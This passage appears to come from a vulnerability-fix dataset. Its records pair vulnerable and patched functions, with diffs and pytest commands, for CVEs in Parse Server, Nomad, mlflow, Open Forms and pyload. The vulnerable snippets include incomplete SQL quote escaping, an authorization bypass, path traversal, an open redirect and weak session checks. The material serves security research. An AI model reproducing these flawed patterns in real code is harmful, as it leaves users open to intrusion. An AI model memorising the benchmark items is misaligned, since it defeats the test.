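    except IntegrityError:
        session.rollback()
        print("Duplicate key. This key already exists or is associated to another user.")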
"file_path": "src/Adapters/Storage/Postgres/PostgresStorageAdapter.js", "start_line": "2632", "end_line": "2661", "snippet": "function literalizeRegexPart(s: string) {\n const matcher1 = /\\\\Q((?!\\\\E).*)\\\\E$/;\n const result1: any = s.match(matcher1);\n if (result1 && result1.length > 1 && result1.index > -1) {\n // process regex that has a beginning and an end specified for the literal text\n const prefix = s.substring(0, result1.index);\n const remaining = result1[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // process regex that has a beginning specified for the literal text\n const matcher2 = /\\\\Q((?!\\\\E).*)$/;\n const result2: any = s.match(matcher2);\n if (result2 && result2.length > 1 && result2.index > -1) {\n const prefix = s.substring(0, result2.index);\n const remaining = result2[1];\n\n return literalizeRegexPart(prefix) + createLiteralRegex(remaining);\n }\n\n // remove all instances of \\Q and \\E from the remaining text & escape single quotes\n return s\n .replace(/([^\\\\])(\\\\E)/, '$1')\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n .replace(/([^'])'/g, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n}"}], "vul_patch": "--- a/src/Adapters/Storage/Postgres/PostgresStorageAdapter.js\n+++ b/src/Adapters/Storage/Postgres/PostgresStorageAdapter.js\n@@ -25,6 +25,6 @@\n .replace(/([^\\\\])(\\\\Q)/, '$1')\n .replace(/^\\\\E/, '')\n .replace(/^\\\\Q/, '')\n- .replace(/([^'])'/, `$1''`)\n+ .replace(/([^'])'/g, `$1''`)\n .replace(/^'([^'])/, `''$1`);\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-1782", "cve_description": "HashiCorp Nomad and Nomad Enterprise versions 1.5.0 up to 1.5.2 allow unauthenticated users to bypass intended ACL authorizations for clusters where mTLS is not enabled. 
This issue is fixed in version 1.5.3.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/hashicorp/nomad", "patch_url": ["https://github.com/hashicorp/nomad/commit/3e93b707d282b04fa0b24a3ca6cfafd4aeee3343"], "programing_language": "Go", "vul_func": [{"id": "vul_go_153_1", "commit": "d014fe6", "file_path": "nomad/acl.go", "start_line": 30, "end_line": 132, "snippet": "func (s *Server) Authenticate(ctx *RPCContext, args structs.RequestWithIdentity) error {\n\n\t// get the user ACLToken or anonymous token\n\tsecretID := args.GetAuthToken()\n\taclToken, err := s.ResolveSecretToken(secretID)\n\n\tswitch {\n\tcase err == nil:\n\t\t// If ACLs are disabled or we have a non-anonymous token, return that.\n\t\tif aclToken == nil || aclToken != structs.AnonymousACLToken {\n\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\t\treturn nil\n\t\t}\n\n\tcase errors.Is(err, structs.ErrTokenExpired):\n\t\treturn err\n\n\tcase errors.Is(err, structs.ErrTokenInvalid):\n\t\t// if it's not a UUID it might be an identity claim\n\t\tclaims, err := s.VerifyClaim(secretID)\n\t\tif err != nil {\n\t\t\t// we already know the token wasn't valid for an ACL in the state\n\t\t\t// store, so if we get an error at this point we have an invalid\n\t\t\t// token and there are no other options but to bail out\n\t\t\treturn err\n\t\t}\n\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{Claims: claims})\n\t\treturn nil\n\n\tcase errors.Is(err, structs.ErrTokenNotFound):\n\t\t// Check if the secret ID is the leader's secret ID, in which case treat\n\t\t// it as a management token.\n\t\tleaderAcl := s.getLeaderAcl()\n\t\tif leaderAcl != \"\" && secretID == leaderAcl {\n\t\t\taclToken = structs.LeaderACLToken\n\t\t\tbreak\n\t\t} else {\n\t\t\t// Otherwise, see if the secret ID belongs to a node. We should\n\t\t\t// reach this point only on first connection.\n\t\t\tnode, err := s.State().NodeBySecretID(nil, secretID)\n\t\t\tif err != nil {\n\t\t\t\t// this is a go-memdb error; shouldn't happen\n\t\t\t\treturn fmt.Errorf(\"could not resolve node secret: %w\", err)\n\t\t\t}\n\t\t\tif node != nil {\n\t\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: node.ID})\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\t// we were passed a bogus token so we'll return an error, but we'll also\n\t\t// want to capture the IP for metrics\n\t\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\t\tif err != nil {\n\t\t\ts.logger.Error(\"could not determine remote address\", \"error\", err)\n\t\t}\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{RemoteIP: remoteIP})\n\t\treturn structs.ErrPermissionDenied\n\n\tdefault: // any other error\n\t\treturn fmt.Errorf(\"could not resolve user: %w\", err)\n\n\t}\n\n\t// If there's no context we're in a \"static\" handler which only happens for\n\t// cases where the leader is making RPCs internally (volumewatcher and\n\t// deploymentwatcher)\n\tif ctx == nil {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\treturn nil\n\t}\n\n\t// At this point we either have an anonymous token or an invalid one.\n\n\t// Previously-connected clients will have a NodeID set on the context, which\n\t// is available for all yamux streams over the same yamux session (and TCP\n\t// connection). 
This will be a large portion of the RPCs sent, but we can't\n\t// fast-path this at the top of the method, because authenticated HTTP\n\t// requests to the clients will come in over to the same session.\n\tif ctx.NodeID != \"\" {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n\t\treturn nil\n\t}\n\n\t// Unlike clients that provide their Node ID on first connection, server\n\t// RPCs don't include an ID for the server so we identify servers by cert\n\t// and IP address.\n\tidentity := &structs.AuthenticatedIdentity{ACLToken: aclToken}\n\tif ctx.TLS {\n\t\tidentity.TLSName = ctx.Certificate().Subject.CommonName\n\t}\n\n\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\tif err != nil {\n\t\ts.logger.Error(\n\t\t\t\"could not authenticate RPC request or determine remote address\", \"error\", err)\n\t\treturn err\n\t}\n\tidentity.RemoteIP = remoteIP\n\targs.SetIdentity(identity)\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_153_1", "commit": "3e93b70", "file_path": "nomad/acl.go", "start_line": 30, "end_line": 129, "snippet": "func (s *Server) Authenticate(ctx *RPCContext, args structs.RequestWithIdentity) error {\n\n\t// get the user ACLToken or anonymous token\n\tsecretID := args.GetAuthToken()\n\taclToken, err := s.ResolveSecretToken(secretID)\n\n\tswitch {\n\tcase err == nil:\n\t\t// If ACLs are disabled or we have a non-anonymous token, return that.\n\t\tif aclToken == nil || aclToken != structs.AnonymousACLToken {\n\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\t\treturn nil\n\t\t}\n\n\tcase errors.Is(err, structs.ErrTokenExpired):\n\t\treturn err\n\n\tcase errors.Is(err, structs.ErrTokenInvalid):\n\t\t// if it's not a UUID it might be an identity claim\n\t\tclaims, err := s.VerifyClaim(secretID)\n\t\tif err != nil {\n\t\t\t// we already know the token wasn't valid for an ACL in the state\n\t\t\t// store, so if we get an error at this point we have an invalid\n\t\t\t// token and there are no other options but to bail out\n\t\t\treturn err\n\t\t}\n\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{Claims: claims})\n\t\treturn nil\n\n\tcase errors.Is(err, structs.ErrTokenNotFound):\n\t\t// Check if the secret ID is the leader's secret ID, in which case treat\n\t\t// it as a management token.\n\t\tleaderAcl := s.getLeaderAcl()\n\t\tif leaderAcl != \"\" && secretID == leaderAcl {\n\t\t\taclToken = structs.LeaderACLToken\n\t\t\tbreak\n\t\t} else {\n\t\t\t// Otherwise, see if the secret ID belongs to a node. 
We should\n\t\t\t// reach this point only on first connection.\n\t\t\tnode, err := s.State().NodeBySecretID(nil, secretID)\n\t\t\tif err != nil {\n\t\t\t\t// this is a go-memdb error; shouldn't happen\n\t\t\t\treturn fmt.Errorf(\"could not resolve node secret: %w\", err)\n\t\t\t}\n\t\t\tif node != nil {\n\t\t\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: node.ID})\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\n\t\t// we were passed a bogus token so we'll return an error, but we'll also\n\t\t// want to capture the IP for metrics\n\t\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\t\tif err != nil {\n\t\t\ts.logger.Error(\"could not determine remote address\", \"error\", err)\n\t\t}\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{RemoteIP: remoteIP})\n\t\treturn structs.ErrPermissionDenied\n\n\tdefault: // any other error\n\t\treturn fmt.Errorf(\"could not resolve user: %w\", err)\n\n\t}\n\n\t// If there's no context we're in a \"static\" handler which only happens for\n\t// cases where the leader is making RPCs internally (volumewatcher and\n\t// deploymentwatcher)\n\tif ctx == nil {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ACLToken: aclToken})\n\t\treturn nil\n\t}\n\n\t// At this point we either have an anonymous token or an invalid one.\n\n\t// TODO(tgross): remove this entirely in 1.6.0 and enforce that all RPCs\n\t// driven by the clients have secret IDs set\n\tif ctx.NodeID != \"\" && secretID != \"\" {\n\t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n\t\treturn nil\n\t}\n\n\t// Unlike clients that provide their Node ID on first connection, server\n\t// RPCs don't include an ID for the server so we identify servers by cert\n\t// and IP address.\n\tidentity := &structs.AuthenticatedIdentity{ACLToken: aclToken}\n\tif ctx.TLS {\n\t\tidentity.TLSName = ctx.Certificate().Subject.CommonName\n\t}\n\n\tremoteIP, err := s.remoteIPFromRPCContext(ctx)\n\tif err != nil {\n\t\ts.logger.Error(\n\t\t\t\"could not authenticate RPC request or determine remote address\", \"error\", err)\n\t\treturn err\n\t}\n\tidentity.RemoteIP = remoteIP\n\targs.SetIdentity(identity)\n\treturn nil\n}"}], "vul_patch": "--- a/nomad/acl.go\n+++ b/nomad/acl.go\n@@ -73,12 +73,9 @@\n \n \t// At this point we either have an anonymous token or an invalid one.\n \n-\t// Previously-connected clients will have a NodeID set on the context, which\n-\t// is available for all yamux streams over the same yamux session (and TCP\n-\t// connection). 
This will be a large portion of the RPCs sent, but we can't\n-\t// fast-path this at the top of the method, because authenticated HTTP\n-\t// requests to the clients will come in over to the same session.\n-\tif ctx.NodeID != \"\" {\n+\t// TODO(tgross): remove this entirely in 1.6.0 and enforce that all RPCs\n+\t// driven by the clients have secret IDs set\n+\tif ctx.NodeID != \"\" && secretID != \"\" {\n \t\targs.SetIdentity(&structs.AuthenticatedIdentity{ClientID: ctx.NodeID})\n \t\treturn nil\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-30172", "cve_description": "A directory traversal vulnerability in the /get-artifact API method of the mlflow platform up to v2.0.1 allows attackers to read arbitrary files on the server via the path parameter.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/mlflow/mlflow", "patch_url": ["https://github.com/mlflow/mlflow/commit/ac4b697bb0bb8a331944dca63f4235b4bf602ab8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_30_1", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 528, "end_line": 546, "snippet": "def get_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=request_dict[\"path\"],\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n artifact_path = request_dict[\"path\"]\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "vul_py_30_2", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 887, "end_line": 916, "snippet": "def _list_artifacts():\n request_message = _get_request_message(\n ListArtifacts(),\n schema={\n \"run_id\": [_assert_string, _assert_required],\n \"path\": [_assert_string],\n \"page_token\": [_assert_string],\n },\n )\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_entities = _list_artifacts_for_proxied_run_artifact_root(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_entities = _get_artifact_repo(run).list_artifacts(path)\n\n response_message.files.extend([a.to_proto() for a in artifact_entities])\n response_message.root_uri = run.info.artifact_uri\n response = 
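The Nomad record (CVE-2023-1782) above removes a fast path that trusted any RPC arriving over a previously authenticated client session. Transposing the guard from Go into Python for illustration: identity is granted only when the node context AND a non-empty secret are both present. The names below are illustrative, not Nomad's API.

from dataclasses import dataclass
from typing import Optional

@dataclass
class RPCContext:
    node_id: str = ""

def authenticate(ctx: Optional[RPCContext], secret_id: str) -> str:
    # Vulnerable shape was `if ctx.node_id:` -- an unauthenticated caller
    # reusing a client's multiplexed connection inherited the client identity.
    if ctx is not None and ctx.node_id != "" and secret_id != "":
        return f"client:{ctx.node_id}"
    raise PermissionError("Permission denied")

print(authenticate(RPCContext(node_id="node-1"), secret_id="s.abcdef"))  # client:node-1
try:
    authenticate(RPCContext(node_id="node-1"), secret_id="")  # no token -> denied
except PermissionError as exc:
    print(exc)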
Response(mimetype=\"application/json\")\n response.set_data(message_to_json(response_message))\n return response"}, {"id": "vul_py_30_3", "commit": "d1c7621", "file_path": "mlflow/server/handlers.py", "start_line": 1269, "end_line": 1288, "snippet": "def get_model_version_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n relative_path=request_dict[\"path\"],\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n artifact_path = request_dict[\"path\"]\n\n return _send_artifact(artifact_repo, artifact_path)"}], "fix_func": [{"id": "fix_py_30_1", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 548, "end_line": 568, "snippet": "def get_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n path = request_dict[\"path\"]\n validate_path_is_safe(path)\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n artifact_path = path\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "fix_py_30_2", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 909, "end_line": 939, "snippet": "def _list_artifacts():\n request_message = _get_request_message(\n ListArtifacts(),\n schema={\n \"run_id\": [_assert_string, _assert_required],\n \"path\": [_assert_string],\n \"page_token\": [_assert_string],\n },\n )\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n validate_path_is_safe(path)\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n run = _get_tracking_store().get_run(run_id)\n\n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_entities = _list_artifacts_for_proxied_run_artifact_root(\n proxied_artifact_root=run.info.artifact_uri,\n relative_path=path,\n )\n else:\n artifact_entities = _get_artifact_repo(run).list_artifacts(path)\n\n response_message.files.extend([a.to_proto() for a in artifact_entities])\n response_message.root_uri = run.info.artifact_uri\n response = Response(mimetype=\"application/json\")\n response.set_data(message_to_json(response_message))\n return response"}, {"id": "fix_py_30_3", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 1292, "end_line": 1312, "snippet": "def get_model_version_artifact_handler():\n from querystring_parser import parser\n\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n path = 
request_dict[\"path\"]\n validate_path_is_safe(path)\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n relative_path=path,\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n artifact_path = path\n\n return _send_artifact(artifact_repo, artifact_path)"}, {"id": "fix_py_30_4", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 530, "end_line": 544, "snippet": "def validate_path_is_safe(path):\n \"\"\"\n Validates that the specified path is safe to join with a trusted prefix. This is a security\n measure to prevent path traversal attacks. The implementation is based on\n `werkzeug.security.safe_join` (https://github.com/pallets/werkzeug/blob/a3005e6acda7246fe0a684c71921bf4882b4ba1c/src/werkzeug/security.py#L110).\n \"\"\"\n if path != \"\":\n path = posixpath.normpath(path)\n if (\n any(sep in path for sep in _os_alt_seps)\n or os.path.isabs(path)\n or path == \"..\"\n or path.startswith(\"../\")\n ):\n raise MlflowException(f\"Invalid path: {path}\", error_code=INVALID_PARAMETER_VALUE)"}, {"id": "fix_py_30_5", "commit": "ac4b697", "file_path": "mlflow/server/handlers.py", "start_line": 527, "end_line": 527, "snippet": "_os_alt_seps = list(sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != \"/\")"}], "vul_patch": "--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -4,16 +4,18 @@\n query_string = request.query_string.decode(\"utf-8\")\n request_dict = parser.parse(query_string, normalized=True)\n run_id = request_dict.get(\"run_id\") or request_dict.get(\"run_uuid\")\n+ path = request_dict[\"path\"]\n+ validate_path_is_safe(path)\n run = _get_tracking_store().get_run(run_id)\n \n if _is_servable_proxied_run_artifact_root(run.info.artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=run.info.artifact_uri,\n- relative_path=request_dict[\"path\"],\n+ relative_path=path,\n )\n else:\n artifact_repo = _get_artifact_repo(run)\n- artifact_path = request_dict[\"path\"]\n+ artifact_path = path\n \n return _send_artifact(artifact_repo, artifact_path)\n\n--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -10,6 +10,7 @@\n response_message = ListArtifacts.Response()\n if request_message.HasField(\"path\"):\n path = request_message.path\n+ validate_path_is_safe(path)\n else:\n path = None\n run_id = request_message.run_id or request_message.run_uuid\n\n--- a/mlflow/server/handlers.py\n+++ b/mlflow/server/handlers.py\n@@ -5,16 +5,17 @@\n request_dict = parser.parse(query_string, normalized=True)\n name = request_dict.get(\"name\")\n version = request_dict.get(\"version\")\n+ path = request_dict[\"path\"]\n+ validate_path_is_safe(path)\n artifact_uri = _get_model_registry_store().get_model_version_download_uri(name, version)\n-\n if _is_servable_proxied_run_artifact_root(artifact_uri):\n artifact_repo = _get_artifact_repo_mlflow_artifacts()\n artifact_path = _get_proxied_run_artifact_destination_path(\n proxied_artifact_root=artifact_uri,\n- relative_path=request_dict[\"path\"],\n+ relative_path=path,\n )\n else:\n artifact_repo = get_artifact_repository(artifact_uri)\n- artifact_path = request_dict[\"path\"]\n+ artifact_path = path\n \n return 
_send_artifact(artifact_repo, artifact_path)\n\n--- /dev/null\n+++ b/mlflow/server/handlers.py\n@@ -0,0 +1,15 @@\n+def validate_path_is_safe(path):\n+ \"\"\"\n+ Validates that the specified path is safe to join with a trusted prefix. This is a security\n+ measure to prevent path traversal attacks. The implementation is based on\n+ `werkzeug.security.safe_join` (https://github.com/pallets/werkzeug/blob/a3005e6acda7246fe0a684c71921bf4882b4ba1c/src/werkzeug/security.py#L110).\n+ \"\"\"\n+ if path != \"\":\n+ path = posixpath.normpath(path)\n+ if (\n+ any(sep in path for sep in _os_alt_seps)\n+ or os.path.isabs(path)\n+ or path == \"..\"\n+ or path.startswith(\"../\")\n+ ):\n+ raise MlflowException(f\"Invalid path: {path}\", error_code=INVALID_PARAMETER_VALUE)\n\n--- /dev/null\n+++ b/mlflow/server/handlers.py\n@@ -0,0 +1 @@\n+_os_alt_seps = list(sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != \"/\")\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30172:latest\n# bash /workspace/fix-run.sh\nset -e\nexport PATH=\"/workspace/PoC_env/CVE-2023-30172/bin:$PATH\"\ncd /workspace/mlflow\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-30172/bin/python -m pytest tests/tracking/test_rest_tracking.py::test_path_validation tests/tracking/test_rest_tracking.py::test_validate_path_is_safe_good tests/tracking/test_rest_tracking.py::test_validate_path_is_safe_bad\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-30172:latest\n# bash /workspace/unit_test.sh\nset -e\nexport PATH=\"/workspace/PoC_env/CVE-2023-30172/bin:$PATH\"\ncd /workspace/mlflow\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-30172/bin/python -m pytest tests/tracking/test_rest_tracking.py -k \"not test_log_model[file] and not test_log_model[sqlalchemy] and not test_artifacts[file] and not test_artifacts[sqlalchemy]\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-31040", "cve_description": "Open Forms is an application for creating and publishing smart forms. Prior to versions 1.0.9 and 1.1.1, the cookie consent page in Open Forms contains an open redirect by injecting a `referer` querystring parameter and failing to validate the value. A malicious actor is able to redirect users to a website under their control, opening them up for phishing attacks. The redirect is initiated by the open forms backend which is a legimate page, making it less obvious to end users they are being redirected to a malicious website. Versions 1.0.9 and 1.1.1 contain patches for this issue. There are no known workarounds avaialble.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/open-formulieren/open-forms", "patch_url": ["https://github.com/open-formulieren/open-forms/commit/3e8c9cce386e548765783354694fbb9d7a6ea7d3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_265_1", "commit": "908a36a", "file_path": "src/openforms/utils/redirect.py", "start_line": 13, "end_line": 30, "snippet": "def allow_redirect_url(url: str) -> bool:\n \"\"\"\n Check that a redirect target is allowed against the CORS policy.\n\n The \"Cross-Origin Resource Sharing\" configuration specifies which external hosts\n are allowed to access Open Forms. 
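A runnable reduction of mlflow's validate_path_is_safe() from the fix above (CVE-2023-30172), with ValueError standing in for MlflowException so the sketch needs no mlflow import. The checks mirror werkzeug.security.safe_join, which the fix cites.

import os
import posixpath

_os_alt_seps = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]

def validate_path_is_safe(path):
    if path != "":
        path = posixpath.normpath(path)
    if (
        any(sep in path for sep in _os_alt_seps)
        or os.path.isabs(path)
        or path == ".."
        or path.startswith("../")
    ):
        raise ValueError(f"Invalid path: {path}")

validate_path_is_safe("model/weights.bin")  # accepted
for bad in ("../../etc/passwd", "/etc/passwd", "a/../../b"):
    try:
        validate_path_is_safe(bad)  # normpath collapses "a/../../b" to "../b"
    except ValueError as exc:
        print(exc)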
We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n if not cors_conf.CORS_ALLOW_ALL_ORIGINS and not cors.origin_found_in_white_lists(\n origin, parts\n ):\n return False\n else:\n return True"}], "fix_func": [{"id": "fix_py_265_1", "commit": "3e8c9cc", "file_path": "src/openforms/utils/redirect.py", "start_line": 16, "end_line": 47, "snippet": "def allow_redirect_url(url: str) -> bool:\n \"\"\"\n Check that a redirect target is allowed against the CORS policy.\n\n The \"Cross-Origin Resource Sharing\" configuration specifies which external hosts\n are allowed to access Open Forms. We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n # first, check if the URL is in ALLOWED_HOSTS. We deliberately exclude the wildcard\n # setting to require explicit configuration either via ALLOWED_HOSTS or CORS_* settings.\n allowed_hosts_check = url_has_allowed_host_and_scheme(\n url=url,\n allowed_hosts=[host for host in settings.ALLOWED_HOSTS if host != \"*\"],\n # settings.ALLOWED_HOSTS means we are serving the domain, so we can enforce our\n # own custom HTTPS setting.\n require_https=settings.IS_HTTPS,\n )\n # if we pass via ALLOWED_HOSTS, short-circuit, otherwise we check the CORS policy\n # for allowed external domains.\n if allowed_hosts_check:\n return True\n\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n if not cors_conf.CORS_ALLOW_ALL_ORIGINS and not cors.origin_found_in_white_lists(\n origin, parts\n ):\n return False\n else:\n return True"}, {"id": "fix_py_265_2", "commit": "3e8c9cc", "file_path": "src/openforms/forms/templatetags/openforms.py", "start_line": 37, "end_line": 50, "snippet": "def get_allowed_redirect_url(*candidates: str) -> str:\n \"\"\"\n Output the first variable passed that is not empty and is an allowed redirect URL.\n\n Output nothing if none of the values satisfy the requirements.\n\n Heavily insired on the builtin {% firstof %} tag.\n \"\"\"\n for candidate in candidates:\n if not candidate:\n continue\n if allow_redirect_url(candidate):\n return candidate\n return \"\""}], "vul_patch": "--- a/src/openforms/utils/redirect.py\n+++ b/src/openforms/utils/redirect.py\n@@ -6,6 +6,20 @@\n are allowed to access Open Forms. We leverage this configuration to block or allow\n redirects to external hosts.\n \"\"\"\n+ # first, check if the URL is in ALLOWED_HOSTS. 
We deliberately exclude the wildcard\n+ # setting to require explicit configuration either via ALLOWED_HOSTS or CORS_* settings.\n+ allowed_hosts_check = url_has_allowed_host_and_scheme(\n+ url=url,\n+ allowed_hosts=[host for host in settings.ALLOWED_HOSTS if host != \"*\"],\n+ # settings.ALLOWED_HOSTS means we are serving the domain, so we can enforce our\n+ # own custom HTTPS setting.\n+ require_https=settings.IS_HTTPS,\n+ )\n+ # if we pass via ALLOWED_HOSTS, short-circuit, otherwise we check the CORS policy\n+ # for allowed external domains.\n+ if allowed_hosts_check:\n+ return True\n+\n cors = CorsMiddleware()\n origin = origin_from_url(url)\n parts = urlparse(url)\n\n--- /dev/null\n+++ b/src/openforms/utils/redirect.py\n@@ -0,0 +1,14 @@\n+def get_allowed_redirect_url(*candidates: str) -> str:\n+ \"\"\"\n+ Output the first variable passed that is not empty and is an allowed redirect URL.\n+\n+ Output nothing if none of the values satisfy the requirements.\n+\n+ Heavily insired on the builtin {% firstof %} tag.\n+ \"\"\"\n+ for candidate in candidates:\n+ if not candidate:\n+ continue\n+ if allow_redirect_url(candidate):\n+ return candidate\n+ return \"\"\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-0227", "cve_description": "Insufficient Session Expiration in GitHub repository pyload/pyload prior to 0.5.0b3.dev36.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/pyload/pyload", "patch_url": ["https://github.com/pyload/pyload/commit/c035714c0596b704b11af0f8a669352f128ad2d9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_335_1", "commit": "a7e1616", "file_path": "src/pyload/webui/app/helpers.py", "start_line": 166, "end_line": 169, "snippet": "def is_authenticated(session=flask.session):\n return session.get(\"name\") and session.get(\n \"authenticated\"\n ) # NOTE: why checks name?"}], "fix_func": [{"id": "fix_py_335_1", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/webui/app/helpers.py", "start_line": 166, "end_line": 171, "snippet": "def is_authenticated(session=flask.session):\n api = flask.current_app.config[\"PYLOAD_API\"]\n user = session.get(\"name\")\n authenticated = session.get(\"authenticated\")\n\n return authenticated and api.user_exists(user)"}, {"id": "fix_py_335_2", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/core/api/__init__.py", "start_line": 1233, "end_line": 1241, "snippet": " def user_exists(self, username):\n \"\"\"\n Check if a user actually exists in the database.\n\n :param username:\n :return: boolean\n \"\"\"\n return self.pyload.db.user_exists(username)\n"}, {"id": "fix_py_335_3", "commit": "c035714c0596b704b11af0f8a669352f128ad2d9", "file_path": "src/pyload/core/database/user_database.py", "start_line": 95, "end_line": 99, "snippet": " @style.queue\n def user_exists(self, user):\n self.c.execute(\"SELECT name FROM users WHERE name=?\", (user,))\n return self.c.fetchone() is not None\n"}], "vul_patch": "--- a/src/pyload/webui/app/helpers.py\n+++ b/src/pyload/webui/app/helpers.py\n@@ -1,4 +1,6 @@\n def is_authenticated(session=flask.session):\n- return session.get(\"name\") and session.get(\n- \"authenticated\"\n- ) # 